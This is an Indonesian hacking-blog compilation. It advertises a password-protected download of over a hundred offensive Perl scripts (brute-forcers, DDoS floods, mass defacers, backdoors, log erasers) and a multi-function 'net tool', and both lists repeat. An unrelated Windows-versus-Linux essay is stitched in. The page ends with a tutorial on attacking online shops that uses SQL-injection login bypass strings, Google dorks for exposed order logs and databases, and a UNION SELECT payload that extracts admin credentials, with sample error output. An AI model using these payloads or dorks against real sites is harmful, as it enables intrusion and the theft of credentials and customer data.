Greeting Site Is Down Cyber Fighter Family,
Share kumpulan perl script yang biasa digunakan untuk kegiatan hacking, cracking, ddos, deface, reversing, dll. Download Hacking Tools 2013, Hacking Tools 2013, Tools Hacking 2013, Cracking Tools 2013, Tools Cracking 2013, Tool Hack 2013, Tool Crack 2013, Tool Hacking 2013, Tool Cracking 2013, Tool Hacker 2013, Tool Cracker 2013, Tools Hacker 2013, Tools Cracker 2013, Pentest Tool 2013, Security Tools 2013, Password Hack 2013, yang mungkin bisa bermanfaat untuk bisa anda pakai di 2013. Happy Hacking All 
Ayo buruan download penetration testing 2013 and security tools 2013, networking tools 2013, gmail hacking tools 2013, learn ethical hacking 2013, vulnerability assessment 2013, penetration testing 2013, email hacking 2013, password hacking 2013, reverse engineering 2013. Download hacking tools, networking tools, gmail hacking, learn ethical hacking, vulnerability, penetration testing, hack email, hacking, password hacking, reverse engineering 2013, wifi hacker 2013. Hacker Tools 2013, Hack Tool 2013, Hacker Tool 2013, Hacking Tool 2013, Hack Tool 2013, Cracking Tools 2013, Cracker Tools 2013, Cracking Tool 2013, Cracker Tool 2013, Crack Tools 2013, Crack Tool 2013, Security Tool 2013, Pentester Tool 2013, Password Cracker 2013, Password Hacking 2013.
Cara Penggunaannya:
Unix (Linux) System
- Install PERL di Unix System (biasanya secara default sudah terinstall
- Jalankan script dengan pertintah: perl perl perlscriptfile.pl atau bisa dengan ./perlscriptfile.pl
Windows System
- Download PERL dari Active Perl
- Install Active PERL
- Jalankan dengan perintah: perl perlscriptfile.pl
DOWNLOAD LINK 1:
DOWNLOAD LINK 2:
Password: D3VIL
Berikut daftar menu lengkap isinya:
1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan – Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. NetBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL – Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. Bluetooth Hacking Tool
57. SQL Insertion Crawler
58. Binary Scanner
59. POP3 Crack (bruteforce)
60. Openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. Shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. Simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. Perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server’s list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. Log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. Cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. Connect and send commands to remote iport. the tor network is used for anonymity.
106. Port scanner sweeper.
107. Rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP’s of visiors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5 Reverse
114. Wordlist tool by mousepad
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan – Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. NetBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL – Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. Bluetooth Hacking Tool
57. SQL Insertion Crawler
58. Binary Scanner
59. POP3 Crack (bruteforce)
60. Openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. Shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. Simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. Perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server’s list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. Log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. Cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. Connect and send commands to remote iport. the tor network is used for anonymity.
106. Port scanner sweeper.
107. Rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP’s of visiors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5 Reverse
114. Wordlist tool by mousepad
Selamat menggunakan dan mencoba satu persatu, semoga berhasil. Goodluck all
Greeting Site Is Down Cyber Fighter Familiy
Kali ini ane mau berbagi aplikasi keren nih namanya net tool mungkin udah ada yang tau, tapi ya gapapa lah namanya juga berbagi.
Aplikasi ini sangat bermanfaat menurut ane, aplikasi ini berfungsi untuk banyak hal antara lain buat bom email, DDOS, mencari kelemahan dari suatu server. Wah serem banget ya aplikasi ini? Tapi tenang aja aplikasi ini sebenernya bermanfaat banget buat agan agan yang ingin jadi admin jaringan alias security network. Karena agan bisa ngetes server yang agan tanganin apakah itu server udah aman apa belom?
Buat agan agan yang mau belajar jadi admin jarinagn cocok banget nih agan tinggal buat aja server sediri di rumah. Ane udah coba aplikasi ini dengan cara ane buat mail server, web server, ftp server sendiri di rumah lalu ane serang pake aplikasi ini jadi ane bisa tau dimana kelemahan server yang ane buat.
Tanpa berlama lama lagi langsung aja donlot aplikasi nya:
Ini dia penampakan aplikasi nya
Tampilan beberapa fungsinya:
Fungsinya:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
**PERHATIAN : Gunakan aplikasi ini sebaik baiknya, gunakanlah untuk pembelajaran bukan untuk merugikan orang lain
Sekian
Oke, sebuah posting dengan judul yang rumit dan aneh. Disini, saya akan membahas apa yang menyebabkan konflik antara user windows dan linux beserta pemecahannya. Ada 2 golongan disini. Saya yakin bahwa user A akan berkata, “Ah, orang kurang kerjaan. Cuma bisa mbandingin windows dan linux. LOL!”. Sedangkan para user B akan berkata, “Hmm, apaan nih posting? Kayaknya penting untuk dibaca!”.
Ya, perkataan kedua user itu benar. Hanya saja kurang tepat. Terutama yang dikatakan user A, sangat-sangat kikuk. Tidak bisa membedakan kah anda antara kata “Pemecahan” dengan “Pembandingan”? Kalau saya punya uang, sudah pasti saya kirim lagi ke SD!
Baiklah, yang pertama, saya jelaskan SEKALI LAGI fakta-fakta sebenarnya tentang linux :
Penjelasan.
- Linux tidak sepenuhnya aman
Ya, saya berani 100% berkata seperti ini. Windows sangatlah rawan dengan virus dan desktop-attack lainnya. Tapi lumayan aman dengan web-attack. Di linux, tidak ada yang namanya Virus. Yang ada hanyalah Rootkit. Rootkit hadir di beragam sistem operasi seperti, Linux, Solaris dan Microsoft Windows. Rootkit ini sering mengubah bagian dari sistem operasi dan juga menginstall dirinya sendiri sebagai driver atau modul kernel (dari wikipedia). Kalau linux benar-benar aman, buat apa ada kaspersky versi linux? - Tidak semua distro Linux gratis
Ya, tidak semua distro linux itu gratis. Misalnya, Red Hat Enterprise Linux (RHEL), dihargai sekitar satu juta sampai sepuluh juta rupiah! Tentu saja distro RHEL ini ditujukan untuk keperluan khusus, misalnya server, dll.
Tanya Jawab.
- T: Katanya Linux mahal ya? Harganya bisa sampai ratusan ribu ya?
J: Iya, jika kamu membeli linux untuk keperluan server seperti RedHat Enterprise Linux. Selain itu, banyak distro linux gratis didownload, dan harga CD Linux pun hanya berkisar sekitar Rp5000-20.000saja. - T : Beberapa orang mengatakan Linux itu susah dan hanya untuk keperluan bekerja. Benarkah itu?
J : Iya, jika kamu menggunakan Linux yang Jadul. Sekarang, sudah banyak distro linux yang tampilannya lebih keren dari windows dan juga User-Friendly. - T : Katanya Linux itu bisa membuat kita meng-hack linux itu sendiri karena kita otak-atik?
J : Tidak. Cobalah definisikan kata “hack”. Memangnya user windows tidak pernah mengutak-atik windows itu sendiri - ?
- T : Kata teman saya, tampilan linux itu jelek dan tidak menarik. Benarkah?
J : Salah! Coba anda cari screenshot Ubuntu 11.10. Jauh berbeda dengan windows yang cenderung terlihat monoton di semua versinya. - T : Berapa rata-rata harga CD distro linux?
J : Kalau anda minta CD-nya dikirim (misalnya kita beli di online-shop), tentu saja kita diminta membayar ongkos kirimnya. Tapi, kalau anda mendownload file .iso distro-nya, tinggal sediakan CD Kosong dan burn! Simpel kan? - Bebas dikembangkan dengan cara apapun.
- Bebas digunakan semua orang.
- Bebas digunakan untuk kepentingan komersial dan pendidikan.
- Bebas didistribusikan dengan cara apapun. Termasuk dengan cara dijual.
Kenapa tidak disebutkan “Macintosh/Apple” disini? Kan sama-sama OS yang merajai dunia komputer?
Macintosh tidak diikutkan, karena hubungan Mac dengan Linux dan Windows saat ini relatif stabil.
Sekarang, kita bahas terlebih dahulu apa itu Windows & Linux. Windows, adalah salah satu OS, ya, OS. Sedangkan Linux sebenarnya adalah “kernel”. Kernel ibarat otak. Jadi, kernel adalah pengatur segala sesuatunya di suatu OS. Nah, para pengembang-pengembang Linux memanfaatkan kernel ini dan membuat tampilan GUI, sehingga tidak hanya berupa background hitam dan text putih seperti waktu dulu.
Salah satu yang membedakan Linux dan Windows ini adalah prinsip dan latar belakangnya. Windows memiliki prinsip closed-source dan memiliki latar belakang komersial di bawah naungan Microsoft. Closed-source ini artinya tidak membagikan kode sumber secara bebas. Sehingga orang yang ingin menjadi pengembang Windows harus bekerja untuk microsoft
.
Bagaimana dengan linux? Linux memiliki prinsip open-source dan latar belakang non-komersial. Open-source disini adalah kebalikan closed-source, kode sumber boleh dibagikan secara bebas. Latar belakang non-komersial ini juga turut membuat perkembangan Linux menjadi sangat pesat. Ada beberapa hal yang perlu diingat, arti dari opensource adalah sebagai berikut :
Oke, sekarang kita akan menggunakan istilah “proprietary”, (dalam hal ini adalah Microsoft), dan OSS untuk Opensource Software
.
Selain masalah salah kaprah tentang OSS yang berbayar dan gratis, ada lagi yang masih terlihat salah terhadap OSS yang lain, yaitu masalah penggunaan Open Source. Pertanyaan yang menimbulkan masalahnya adalah begini: “Kapan Anda menggunakan OSS?”.
Ternyata banyak yang masih bingung jawabnya. Ada yang beralasan gak bisa jawab karena masih menggunakan sistem operasi proprietary terkenal sejagad raya bernama Windows. Saya cuma bisa geleng-geleng kepala dan mengelus dada. Untuk kasus di atas mungkin kernelnya tidak open source. Tapi bisa saja aplikasi yang digunakan sehari2 adalah OSS.
Katakanlah ada Mister X yang merupakan pengguna setia Windows (genuine). Selain memanfaatkan Windows (operating system proprietary), Mister X adalah seorang pengembang aplikasi web. Dia menggunakan IIS (web server proprietary) sebagai toolsnya. Kemudian pada IIS-nya dia menanamkan PHP engine, menginstall dan mengkonfigurasi MySQL server agar bisa berjalan baik di komputernya. Untuk mengecek hasil desain aplikasi web nya, Mister X menggunakan Mozilla Firefox. Untuk contoh ini, maka kernel Windows Mister X emang bukan OSS. Source code kernel Windows tidak disediakan untuk publik secara
bebas.
Web Server IIS Mister X juga tidak bisa dimodifikasi seenaknya, karena source codenya hak cipta Microsoft (Proprietary). MySQL Server Mister X adalah salah satu produk OSS. Kalo gak percaya anda bisa download source codenya di situsnya. Siapa tau sampean pengen ngembangin MySQL Server versi sendiri.
Dalam contoh ini, Mister X hanya sekedar memanfaatkan OSS. Tapi kan Firefox yang dipake Mister X juga produk OSS. Free pada OSS adalah free dalam arti “bebas”, bukan “gratis”. Lebih tepatnya bukan “Free” tapi “Freedom”. Karena tidak semua OSS dihargai nol rupiah alias gratis. Lagipula, tidak semua Proprietary Source juga berbayar. Ada juga yang nol rupiah alias freeware.
Alangkah bagusnya jika kita menggunakan OSS secara menyeluruh. Mulai dari pake kernel yang memang kode sumbernya terbuka seperti Linux atau BSD. Sampe aplikasinya juga OSS. Pengguna OSS ada dua jenis menurut saya, yaitu golongan yang memang butuh source code dari program lain untuk pengembangan softwarenya lebih lanjut. Serta golongan simpatisan OSS aja. Karena prinsip berbagi source code seperti berbagi jasa aja. Kalo ada orang lain yang ngasih source code secara cuma-cuma, maka rasanya “nggak enak” gitu kalo kita yang pengembang juga ga ngasih harga cuma-cuma juga.
Oke, back to topic. Intinya, kita tidak bisa menggunakan salah satu saja dari 2 OS ini. Bila anda memakai Windows, web yang anda kunjungi, 99,9% saya yakin serverwebnya adalah Linux. Jarang sekali ada web yang servernya windows, karena manja dan harus direstart ulang setiap harinya. Sedangkan server linux? Serverweb linux bisa berjalan 5 tahun tanpa manja dan tanpa minta direstart ulang.
Oh iya, sampai lupa, Apple juga turut serta dalam pengembangan komputer di jagad raya ini. Bebarapa distro linux, GUI-nya terinspirasi dari tampilan Macintosh. Tapi bukan berarti mencontek dan mengklaim-klaim lho
ya… 
Tidak hanya itu, Apple juga turut berpartisipasi untuk menaikan harga komputer di dunia ini. Hehehe… 
Lalu, yang membuat Linux kurang populer? Ya, jam terbang alias waktu munculnya sudah dicuri start oleh Microsoft dan Apple. Jadi, ya wajar saja kalau terjadi adu mulut dan kemampuan di antara 2 user OS ini.
Perlu diingat, saya tidak membanding-bandingkan, hanya membahas masalah konflik ini saja.
Salam Open Source!
Hello Sahabat Site Is Down Cyber Fightre
1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :
Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil
2. Shopping Order Log – Informasi Log Order di Server
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt
Selamat menemukan
3. Database Information – Database Source Location – Database Path
Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb
Selamat mencari.. ^^
4. SQL Injection Advanced Shop Vulnreabilty
Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1′ UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :
DB ERROR 1064
We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line
Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION
